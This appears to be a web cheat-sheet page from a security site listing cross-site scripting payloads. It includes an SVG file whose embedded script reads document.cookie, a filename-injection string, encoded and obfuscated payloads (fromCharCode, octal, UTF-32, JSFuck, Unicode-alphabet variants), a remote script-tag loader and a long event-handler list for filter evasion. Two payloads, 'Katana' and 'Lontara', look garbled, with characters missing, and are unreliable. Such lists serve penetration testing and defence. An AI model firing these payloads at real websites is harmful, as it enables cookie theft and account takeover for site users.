pwny.cc
Search…
Cross-Site Scripting (XSS)

XSS inside SVG File

1
<?xml version="1.0" standalone="no"?>
2
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
3
4
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
5
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
6
<script type="text/javascript">
7
alert(document.cookie);
8
</script>
9
</svg>
Copied!

XSS in filename

1
"><img src=x onerror=prompt(1).jpg
Copied!

Weird Payloads

1
//XSS using eval() and fromCharCode
2
<img onload="javascript:alert(String.fromCharCode(97,108,101,114,116,40,39,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,39,41,59))">
3
4
//Octal encoding
5
javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
6
7
//UTF-32
8
%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
9
10
//JSfuck
11
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
12
13
//XSS in hidden input - Use CTRL+SHIFT+X to trigger the onclick event
14
<input type="hidden" accesskey="X" onclick="alert(1)">
15
16
//Unicode 's' character
17
<ſcript/src=//127.0.0.1/xss.js>
18
19
//Katana payload
20
javascript:([,,,,,]=[]+{},[,,,,,,,,,,]=[!!]+!+.)[=++++++++++][](+++++'(-~ウ)')()
21
22
//Lontara payload
23
='',=!+,=!+,=+{},=[++],=[=],=+++,=[+],[+=[]+(.+)[]+[]+++[]+++[]+][]([]+[]+[]+++"(ᨆ)")()
24
25
//Cuneiform-alphabet payload
26
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
27
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
28
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
29
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
30
31
//Typical iframe
32
<iframe src=javascript:alert(1)>
Copied!

Event handlers

1
"onabort",
2
"onactivate",
3
"onafterprint",
4
"onafterscriptexecute",
5
"onafterupdate",
6
"onanimationend",
7
"onanimationiteration",
8
"onanimationstart",
9
"onariarequest",
10
"onautocomplete",
11
"onautocompleteerror",
12
"onbeforeactivate",
13
"onbeforecopy",
14
"onbeforecut",
15
"onbeforedeactivate",
16
"onbeforeeditfocus",
17
"onbeforepaste",
18
"onbeforeprint",
19
"onbeforescriptexecute",
20
"onbeforeunload",
21
"onbeforeupdate",
22
"onbegin",
23
"onblur",
24
"onbounce",
25
"oncancel",
26
"oncanplay",
27
"oncanplaythrough",
28
"oncellchange",
29
"onchange",
30
"onclick",
31
"onclose",
32
"oncommand",
33
"oncompassneedscalibration",
34
"oncontextmenu",
35
"oncontrolselect",
36
"oncopy",
37
"oncuechange",
38
"oncut",
39
"ondataavailable",
40
"ondatasetchanged",
41
"ondatasetcomplete",
42
"ondblclick",
43
"ondeactivate",
44
"ondevicelight",
45
"ondevicemotion",
46
"ondeviceorientation",
47
"ondeviceproximity",
48
"ondrag",
49
"ondragdrop",
50
"ondragend",
51
"ondragenter",
52
"ondragleave",
53
"ondragover",
54
"ondragstart",
55
"ondrop",
56
"ondurationchange",
57
"onemptied",
58
"onend",
59
"onended",
60
"onerror",
61
"onerrorupdate",
62
"onexit",
63
"onfilterchange",
64
"onfinish",
65
"onfocus",
66
"onfocusin",
67
"onfocusout",
68
"onformchange",
69
"onforminput",
70
"onfullscreenchange",
71
"onfullscreenerror",
72
"ongotpointercapture",
73
"onhashchange",
74
"onhelp",
75
"oninput",
76
"oninvalid",
77
"onkeydown",
78
"onkeypress",
79
"onkeyup",
80
"onlanguagechange",
81
"onlayoutcomplete",
82
"onload",
83
"onloadeddata",
84
"onloadedmetadata",
85
"onloadstart",
86
"onlosecapture",
87
"onlostpointercapture",
88
"onmediacomplete",
89
"onmediaerror",
90
"onmessage",
91
"onmousedown",
92
"onmouseenter",
93
"onmouseleave",
94
"onmousemove",
95
"onmouseout",
96
"onmouseover",
97
"onmouseup",
98
"onmousewheel",
99
"onmove",
100
"onmoveend",
101
"onmovestart",
102
"onmozfullscreenchange",
103
"onmozfullscreenerror",
104
"onmozpointerlockchange",
105
"onmozpointerlockerror",
106
"onmscontentzoom",
107
"onmsfullscreenchange",
108
"onmsfullscreenerror",
109
"onmsgesturechange",
110
"onmsgesturedoubletap",
111
"onmsgestureend",
112
"onmsgesturehold",
113
"onmsgesturestart",
114
"onmsgesturetap",
115
"onmsgotpointercapture",
116
"onmsinertiastart",
117
"onmslostpointercapture",
118
"onmsmanipulationstatechanged",
119
"onmspointercancel",
120
"onmspointerdown",
121
"onmspointerenter",
122
"onmspointerleave",
123
"onmspointermove",
124
"onmspointerout",
125
"onmspointerover",
126
"onmspointerup",
127
"onmssitemodejumplistitemremoved",
128
"onmsthumbnailclick",
129
"onoffline",
130
"ononline",
131
"onoutofsync",
132
"onpage",
133
"onpagehide",
134
"onpageshow",
135
"onpaste",
136
"onpause",
137
"onplay",
138
"onplaying",
139
"onpointercancel",
140
"onpointerdown",
141
"onpointerenter",
142
"onpointerleave",
143
"onpointerlockchange",
144
"onpointerlockerror",
145
"onpointermove",
146
"onpointerout",
147
"onpointerover",
148
"onpointerup",
149
"onpopstate",
150
"onprogress",
151
"onpropertychange",
152
"onratechange",
153
"onreadystatechange",
154
"onreceived",
155
"onrepeat",
156
"onreset",
157
"onresize",
158
"onresizeend",
159
"onresizestart",
160
"onresume",
161
"onreverse",
162
"onrowdelete",
163
"onrowenter",
164
"onrowexit",
165
"onrowinserted",
166
"onrowsdelete",
167
"onrowsinserted",
168
"onscroll",
169
"onsearch",
170
"onseek",
171
"onseeked",
172
"onseeking",
173
"onselect",
174
"onselectionchange",
175
"onselectstart",
176
"onshow",
177
"onstalled",
178
"onstart",
179
"onstop",
180
"onstorage",
181
"onstoragecommit",
182
"onsubmit",
183
"onsuspend",
184
"onsynchrestored",
185
"ontimeerror",
186
"ontimeupdate",
187
"ontoggle",
188
"ontrackchange",
189
"ontransitionend",
190
"onunload",
191
"onurlflip",
192
"onuserproximity",
193
"onvolumechange",
194
"onwaiting",
195
"onwebkitanimationend",
196
"onwebkitanimationiteration",
197
"onwebkitanimationstart",
198
"onwebkitfullscreenchange",
199
"onwebkitfullscreenerror",
200
"onwebkittransitionend",
201
"onwheel"
Copied!

References

XSS Hunter
Platform to hunt XSS vulnerabilities
GitHub - vkbiu/KNR-XSS-Payloads: Payloads For XSS
GitHub
XSS Payloads Repository
GitHub - terjanq/Tiny-XSS-Payloads: A collection of tiny XSS Payloads that can be used in different contexts. https://tinyxss.terjanq.me
GitHub
Tiny XSS Payloads
Last modified 3mo ago